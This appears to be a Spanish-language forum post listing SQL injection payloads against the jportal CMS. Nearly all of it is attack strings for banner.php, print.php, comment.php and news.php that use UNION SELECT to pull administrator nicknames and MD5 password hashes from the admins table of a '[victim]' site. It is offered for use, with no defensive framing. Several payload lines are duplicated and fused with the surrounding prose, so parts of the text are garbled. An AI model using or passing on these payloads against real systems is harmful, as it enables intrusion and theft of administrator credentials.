http://[victim]/jportal/banner.php
e intentamos esto:
Código:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
NULL, NULL, NULL, NULL, NULL from admins where '1=1
y tambien:
Código:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
NULL, NULL, NULL, NULL, NULL from admins where '1=1
despues de esto, obtenemos el user y el password del administrador.
2.-
Código:
print.php?what=article&id=<article id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201
3.-
Código:
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
para obtener el nick del adminand 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
Código:
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, pass, null, null, null, null, null, null,
null, null, null from admins limit n,1)
para obtener el MD5 passwordand 1=0 union (select null, null, pass, null, null, null, null, null, null,
null, null, null from admins limit n,1)
4.-
Código:
print.php?what=article&id=<article id> AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Código:
news.php?id=<news id>%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20--
Código:
print.php?what=article&id=<article id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201
Salu2










Autor


En línea








